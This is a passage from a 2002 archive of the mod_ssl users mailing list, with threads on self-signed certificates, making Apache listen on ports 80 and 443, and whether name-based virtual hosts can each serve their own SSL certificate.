Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 19:39:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17967; Tue, 3 Dec 2002 19:38:17 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id TAA17954; Tue, 3 Dec 2002 19:37:52 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO00002D;
    3 Dec 02 19:37:50 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 3 Dec 02 19:37:28 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG00002C;
   3 Dec 02 19:37:16 +0100
Message-ID: <3DECF9F9.8010008@stupar.homelinux.net>
Date: Tue, 03 Dec 2002 19:37:45 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
References: <92F9C07FBAB86D4D9B76656180AC94774A16E7@isi-mail.isinet.com> <3DECB690.6050603@stupar.homelinux.net> <3DECBE0F.5030001@stupar.homelinux.net> <200212031640.38993.maumar@datalogica.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ok I have made a server certificate and a client certificate. I have
configured apache and ssl.conf with everything necesary BUT when I try
to conect to myserver:443 it tells me "connection has been refused".
Any idea ?

Maurizio Marini wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Tuesday 03 December 2002 03:22 pm, Sasa STUPAR wrote:
>  >OK, so creating a certifikate is done. How do I sign it ? I am using
>  >windows but I have read in the documents to use sign.sh in mod-perl. Ok
>  >but I am not having Linux anywhere near me. So what can I do ?
>  >
> 
> try a self-signed
> openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout server.key -out server.crt
> 
> 
> - -- 
> Maurizio Marini		
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> 
> iD8DBQE97NB24Q/49nIJTlwRAu9MAJwP7waOwN/J2dYSzL4L9RkHNjpRrwCfTI65
> M0p49MjvotSa30mCfOFLL30=
> =P32L
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 20:11:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA19461; Tue, 3 Dec 2002 20:10:31 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vopmail.pshift.com id UAA19417; Tue, 3 Dec 2002 20:09:34 +0100 (MET)
Received: from support3 (unverified [63.166.217.34]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Tue, 3 Dec 2002 14:01:09 -0500
Message-ID: <011c01c29afe$e2d55e40$0800a8c0@support3>
From: "Justin Williams" 
To: 
Subject: (Hopefully) easy SSL question
Date: Tue, 3 Dec 2002 14:05:03 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have openssl and mod_ssl on a server running Apache.
On independent IPs, I have three websites.  One is listening *only* on port
443, and works just fine.  The other two need to listen on both 80 and 443,
but I have only been able to get them to listen on one port at a time.  If I
add the directive: SSLEngine on, then port 80 stops listening (more
accuarately, it complains that I didn't type in https:).  If I remove that
directive, then port 443 stops listening.  Page cannot be found.  Is there
some other directive I need to use?  Thanks!!

Justin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 20:20:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA19897; Tue, 3 Dec 2002 20:19:31 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id UAA19877; Tue, 3 Dec 2002 20:18:56 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA16996;
	Tue, 3 Dec 2002 14:19:33 -0500
Date: Tue, 3 Dec 2002 14:19:31 -0500 (EST)
From: "R. DuFresne" 
To: Justin Williams 
cc: modssl-users@modssl.org
Subject: Re: (Hopefully) easy SSL question
In-Reply-To: <011c01c29afe$e2d55e40$0800a8c0@support3>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



under the  directive, list each port to listen on with the:
Listen domain.com:80
Listen domain.com:443
...


see if that corrects matters for you.

Thanks,

Ron DuFresne

On Tue, 3 Dec 2002, Justin Williams wrote:

> I have openssl and mod_ssl on a server running Apache.
> On independent IPs, I have three websites.  One is listening *only* on port
> 443, and works just fine.  The other two need to listen on both 80 and 443,
> but I have only been able to get them to listen on one port at a time.  If I
> add the directive: SSLEngine on, then port 80 stops listening (more
> accuarately, it complains that I didn't type in https:).  If I remove that
> directive, then port 443 stops listening.  Page cannot be found.  Is there
> some other directive I need to use?  Thanks!!
> 
> Justin
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 20:27:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20194; Tue, 3 Dec 2002 20:26:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vopmail.pshift.com id UAA20181; Tue, 3 Dec 2002 20:25:40 +0100 (MET)
Received: from support3 (unverified [63.166.217.34]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Tue, 3 Dec 2002 14:22:15 -0500
Message-ID: <012e01c29b01$d4fe1890$0800a8c0@support3>
From: "Justin Williams" 
To: 
References: 
Subject: Re: (Hopefully) easy SSL question
Date: Tue, 3 Dec 2002 14:26:08 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is this directive the same thing as ?
Thanks!
----- Original Message -----
From: "R. DuFresne" 
To: "Justin Williams" 
Cc: 
Sent: Tuesday, December 03, 2002 2:19 PM
Subject: Re: (Hopefully) easy SSL question


>
>
> under the  directive, list each port to listen on with the:
> Listen domain.com:80
> Listen domain.com:443
> ...
> 
>
> see if that corrects matters for you.
>
> Thanks,
>
> Ron DuFresne
>
> On Tue, 3 Dec 2002, Justin Williams wrote:
>
> > I have openssl and mod_ssl on a server running Apache.
> > On independent IPs, I have three websites.  One is listening *only* on
port
> > 443, and works just fine.  The other two need to listen on both 80 and
443,
> > but I have only been able to get them to listen on one port at a time.
If I
> > add the directive: SSLEngine on, then port 80 stops listening (more
> > accuarately, it complains that I didn't type in https:).  If I remove
that
> > directive, then port 443 stops listening.  Page cannot be found.  Is
there
> > some other directive I need to use?  Thanks!!
> >
> > Justin
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
>
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
>
> testing, only testing, and damn good at it too!
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 20:50:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20992; Tue, 3 Dec 2002 20:49:40 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA20948; Tue, 3 Dec 2002 20:48:06 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8D71E4CE72D; Tue,  3 Dec 2002 20:48:05 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 67737287BF; Tue,  3 Dec 2002 20:46:22 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailexchange.infinetcomm.com id TAA17417; Tue, 3 Dec 2002 19:24:47 +0100 (MET)
Received: from imail.torinfinet.infinetcomm.com (imail [10.98.1.31])
	by mailexchange.infinetcomm.com (8.11.4/8.11.4) with ESMTP id gB3HE2812535
	for ; Tue, 3 Dec 2002 12:14:02 -0500
Received: by imail.torinfinet.infinetcomm.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 3 Dec 2002 13:24:31 -0500
Message-ID: <49A0B02B67B70045B358D868C7B5D0C76C1302@imail.torinfinet.infinetcomm.com>
From: Shawn Syms 
To: "'modssl-users@modssl.org'" 
Subject: RE: how to add multiple SSL cert for each virtual host?
Date: Tue, 3 Dec 2002 13:24:25 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="windows-1250"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shawn Syms 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Multiple SSL certs for name-based virtual hosts aren't possible based upon
the way SSL is designed. Each site requiring a separate cert must have it's
own IP address.

---
Shawn Syms | Systems Administrator
Infinet Communications | shawn.syms@infinetcommunications.com
---



-----Original Message-----
From: Thomas Sandor [mailto:tsandor@rndsoft.com]
Sent: Tuesday, December 03, 2002 1:20 PM
To: modssl-users@modssl.org
Subject: how to add multiple SSL cert for each virtual host?


hi everyone,

I have an apache 2.0.40 installed on a RedHat 7.2 box, complied with ssl
(openssl 0.9.6g).
Till now I had only one domain for which apache should use SSL cert files
(crt, key), but for our next project I have to add another SSL cert file a
specific domain.

I have NameVirtualHost 12.34.56.78 and have a list of  for
each of our domain, using ServerNamed base aliases, but for the ssl conf it
ain't works. In my ssl.conf in short looks like this:

NameVirtualHost 12.34.56.78:443


    ServerName domain1.com
    CustomLog "..."
    ErrorLog "..."
    SSLEngine on
    SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
    SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"



    ServerName domain2.com
    CustomLog "..."
    ErrorLog "..."
    SSLEngine on
    SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
    SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"


The problem is that apache does not serve domain2 cert files for domain2, it
uses the first declaration for every https://domainX.com invoke. Does anyone
know how to tell apache to uses specific SSL cert I'd like to define for
each of my virtualhosts?

Thanks in advance for any help.

Regards,
Thomas

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 21:33:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23045; Tue, 3 Dec 2002 21:32:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from denali.nightsource.com id VAA23038; Tue, 3 Dec 2002 21:31:57 +0100 (MET)
Received: from whitney.hackhawk.net (denali.nightsource.com [66.127.0.212] (may be forged))
	by denali.nightsource.com (8.11.0/8.11.0) with ESMTP id gB3Jo0I19716
	for ; Tue, 3 Dec 2002 11:50:01 -0800
Message-Id: <5.1.0.14.0.20021203123221.02d9e820@localhost>
X-Sender:  (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 03 Dec 2002 12:34:58 -0800
To: modssl-users@modssl.org
From: Hack Hawk 
Subject: RE: how to add multiple SSL cert for each virtual host?
In-Reply-To: <49A0B02B67B70045B358D868C7B5D0C76C1302@imail.torinfinet.in
 finetcomm.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hack Hawk 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What?!?!?!  Are you absolutely sure about this?  SSL certs are based on the 
Domain Name,,, NOT the IP address.  It stands to reason that it would be 
possible for virtual hosts/domains to have their own certs.  Perhaps modssl 
doesn't support it, but I think that in theory it's possible.

- hawk

At 10:24 AM 12/03/2002, you wrote:
>Multiple SSL certs for name-based virtual hosts aren't possible based upon
>the way SSL is designed. Each site requiring a separate cert must have it's
>own IP address.
>
>---
>Shawn Syms | Systems Administrator
>Infinet Communications | shawn.syms@infinetcommunications.com
>---
>
>
>
>-----Original Message-----
>From: Thomas Sandor [mailto:tsandor@rndsoft.com]
>Sent: Tuesday, December 03, 2002 1:20 PM
>To: modssl-users@modssl.org
>Subject: how to add multiple SSL cert for each virtual host?
>
>
>hi everyone,
>
>I have an apache 2.0.40 installed on a RedHat 7.2 box, complied with ssl
>(openssl 0.9.6g).
>Till now I had only one domain for which apache should use SSL cert files
>(crt, key), but for our next project I have to add another SSL cert file a
>specific domain.
>
>I have NameVirtualHost 12.34.56.78 and have a list of  for
>each of our domain, using ServerNamed base aliases, but for the ssl conf it
>ain't works. In my ssl.conf in short looks like this:
>
>NameVirtualHost 12.34.56.78:443
>
>
>     ServerName domain1.com
>     CustomLog "..."
>     ErrorLog "..."
>     SSLEngine on
>     SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
>     SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"
>
>
>
>     ServerName domain2.com
>     CustomLog "..."
>     ErrorLog "..."
>     SSLEngine on
>     SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
>     SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"
>
>
>The problem is that apache does not serve domain2 cert files for domain2, it
>uses the first declaration for every https://domainX.com invoke. Does anyone
>know how to tell apache to uses specific SSL cert I'd like to define for
>each of my virtualhosts?
>
>Thanks in advance for any help.
>
>Regards,
>Thomas
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 21:44:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23454; Tue, 3 Dec 2002 21:43:45 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id VAA23427; Tue, 3 Dec 2002 21:43:00 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA17335;
	Tue, 3 Dec 2002 15:43:37 -0500
Date: Tue, 3 Dec 2002 15:43:35 -0500 (EST)
From: "R. DuFresne" 
To: Justin Williams 
cc: modssl-users@modssl.org
Subject: Re: (Hopefully) easy SSL question
In-Reply-To: <012e01c29b01$d4fe1890$0800a8c0@support3>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


  I have that statement coming after the  directive
(meaning it's defined within that /).
Of course, and I dont't state my conf file is the cleanest of meanest, I
have 3 such openings and closings of like this:









This happens to be the first such set if  directives:

 
 Listen domain.com:80
 Listen domain.com:443
 ...
 


Damn, now I have to go cleanup things one of these days .

Thanks,

Ron DuFresne


On Tue, 3 Dec 2002, Justin Williams wrote:

> Is this directive the same thing as ?
> Thanks!
> ----- Original Message -----
> From: "R. DuFresne" 
> To: "Justin Williams" 
> Cc: 
> Sent: Tuesday, December 03, 2002 2:19 PM
> Subject: Re: (Hopefully) easy SSL question
> 
> 
> >
> >
> > under the  directive, list each port to listen on with the:
> > Listen domain.com:80
> > Listen domain.com:443
> > ...
> > 
> >
> > see if that corrects matters for you.
> >
> > Thanks,
> >
> > Ron DuFresne
> >
> > On Tue, 3 Dec 2002, Justin Williams wrote:
> >
> > > I have openssl and mod_ssl on a server running Apache.
> > > On independent IPs, I have three websites.  One is listening *only* on
> port
> > > 443, and works just fine.  The other two need to listen on both 80 and
> 443,
> > > but I have only been able to get them to listen on one port at a time.
> If I
> > > add the directive: SSLEngine on, then port 80 stops listening (more
> > > accuarately, it complains that I didn't type in https:).  If I remove
> that
> > > directive, then port 443 stops listening.  Page cannot be found.  Is
> there
> > > some other directive I need to use?  Thanks!!
> > >
> > > Justin
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> > --
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >         admin & senior security consultant:  sysinfo.com
> >                         http://sysinfo.com
> >
> > "Cutting the space budget really restores my faith in humanity.  It
> > eliminates dreams, goals, and ideals and lets us get straight to the
> > business of hate, debauchery, and self-annihilation."
> >                 -- Johnny Hart
> >
> > testing, only testing, and damn good at it too!
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 21:53:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23856; Tue, 3 Dec 2002 21:52:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.databuilt.com id VAA23844; Tue, 3 Dec 2002 21:51:46 +0100 (MET)
Received: from hh-nts01.databuilt.com ([12.111.128.215])
	by mail.databuilt.com (8.10.2/8.10.2) with ESMTP id gB3Kpeb13824
	for ; Tue, 3 Dec 2002 15:51:40 -0500
Received: from hh-nts01.databuilt.com ([192.168.1.9]) by hh-nts01.databuilt.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Tue, 3 Dec 2002 15:51:43 -0500
Received: FROM w3works.com BY hh-nts01.databuilt.com ; Tue Dec 03 15:51:42 2002 -0500
Date: Tue, 3 Dec 2002 15:52:20 -0500
Subject: Re: how to add multiple SSL cert for each virtual host?
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v548)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <5.1.0.14.0.20021203123221.02d9e820@localhost>
Message-Id: <1DBF876C-0701-11D7-9792-000393464F32@w3works.com>
X-Mailer: Apple Mail (2.548)
X-OriginalArrivalTime: 03 Dec 2002 20:51:43.0457 (UTC) FILETIME=[C9569510:01C29B0D]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Look at the handshake for SSL.  During the name to address translation 
phase, you wind up with a chicken-egg scenario if more than one name 
shares an address.

Not only is it not possible, it'd be a HUGE security flaw if it WERE 
possible.

-dsp

On Tuesday, Dec 3, 2002, at 15:34 US/Eastern, Hack Hawk wrote:

> What?!?!?!  Are you absolutely sure about this?  SSL certs are based 
> on the Domain Name,,, NOT the IP address.  It stands to reason that it 
> would be possible for virtual hosts/domains to have their own certs.  
> Perhaps modssl doesn't support it, but I think that in theory it's 
> possible.
>
> - hawk
>
> At 10:24 AM 12/03/2002, you wrote:
>> Multiple SSL certs for name-based virtual hosts aren't possible based 
>> upon
>> the way SSL is designed. Each site requiring a separate cert must 
>> have it's
>> own IP address.
>>
>> ---
>> Shawn Syms | Systems Administrator
>> Infinet Communications | shawn.syms@infinetcommunications.com
>> ---
>>
>>
>>
>> -----Original Message-----
>> From: Thomas Sandor [mailto:tsandor@rndsoft.com]
>> Sent: Tuesday, December 03, 2002 1:20 PM
>> To: modssl-users@modssl.org
>> Subject: how to add multiple SSL cert for each virtual host?
>>
>>
>> hi everyone,
>>
>> I have an apache 2.0.40 installed on a RedHat 7.2 box, complied with 
>> ssl
>> (openssl 0.9.6g).
>> Till now I had only one domain for which apache should use SSL cert 
>> files
>> (crt, key), but for our next project I have to add another SSL cert 
>> file a
>> specific domain.
>>
>> I have NameVirtualHost 12.34.56.78 and have a list of  
>> for
>> each of our domain, using ServerNamed base aliases, but for the ssl 
>> conf it
>> ain't works. In my ssl.conf in short looks like this:
>>
>> NameVirtualHost 12.34.56.78:443
>>
>> 
>>     ServerName domain1.com
>>     CustomLog "..."
>>     ErrorLog "..."
>>     SSLEngine on
>>     SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
>>     SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"
>> 
>>
>> 
>>     ServerName domain2.com
>>     CustomLog "..."
>>     ErrorLog "..."
>>     SSLEngine on
>>     SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
>>     SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"
>> 
>>
>> The problem is that apache does not serve domain2 cert files for 
>> domain2, it
>> uses the first declaration for every https://domainX.com invoke. Does 
>> anyone
>> know how to tell apache to uses specific SSL cert I'd like to define 
>> for
>> each of my virtualhosts?
>>
>> Thanks in advance for any help.
>>
>> Regards,
>> Thomas
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 21:56:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA24036; Tue, 3 Dec 2002 21:55:59 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vopmail.pshift.com id VAA23932; Tue, 3 Dec 2002 21:54:09 +0100 (MET)
Received: from support3 (unverified [63.166.217.34]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Tue, 3 Dec 2002 15:50:43 -0500
Message-ID: <017201c29b0e$31a99540$0800a8c0@support3>
From: "Justin Williams" 
To: 
References: 
Subject: Re: (Hopefully) easy SSL question
Date: Tue, 3 Dec 2002 15:54:38 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In the if mod_ssl.c, I spotted more than a couple of "Listen" statements.
Any time I added IP:443 in there, Apache pitched a hissy fit.
So, I ended up taking a slightly different route.
I set up two entries in the .conf:
IP1:80
    no SSL info
IP1:443
    SSL info

IP2:80
    no SSL info
IP2:443
    SSL info

Apache stopped complaining, and the domains are listening on both ports...
----- Original Message -----
From: "R. DuFresne" 
To: "Justin Williams" 
Cc: 
Sent: Tuesday, December 03, 2002 3:43 PM
Subject: Re: (Hopefully) easy SSL question


>
>   I have that statement coming after the  directive
> (meaning it's defined within that /).
> Of course, and I dont't state my conf file is the cleanest of meanest, I
> have 3 such openings and closings of like this:
>
> 
> 
> 
> 
> 
> 
>
>
> This happens to be the first such set if  directives:
>
> 
>  Listen domain.com:80
>  Listen domain.com:443
>  ...
>  
>
>
> Damn, now I have to go cleanup things one of these days .
>
> Thanks,
>
> Ron DuFresne
>
>
> On Tue, 3 Dec 2002, Justin Williams wrote:
>
> > Is this directive the same thing as ?
> > Thanks!
> > ----- Original Message -----
> > From: "R. DuFresne" 
> > To: "Justin Williams" 
> > Cc: 
> > Sent: Tuesday, December 03, 2002 2:19 PM
> > Subject: Re: (Hopefully) easy SSL question
> >
> >
> > >
> > >
> > > under the  directive, list each port to listen on with
the:
> > > Listen domain.com:80
> > > Listen domain.com:443
> > > ...
> > > 
> > >
> > > see if that corrects matters for you.
> > >
> > > Thanks,
> > >
> > > Ron DuFresne
> > >
> > > On Tue, 3 Dec 2002, Justin Williams wrote:
> > >
> > > > I have openssl and mod_ssl on a server running Apache.
> > > > On independent IPs, I have three websites.  One is listening *only*
on
> > port
> > > > 443, and works just fine.  The other two need to listen on both 80
and
> > 443,
> > > > but I have only been able to get them to listen on one port at a
time.
> > If I
> > > > add the directive: SSLEngine on, then port 80 stops listening (more
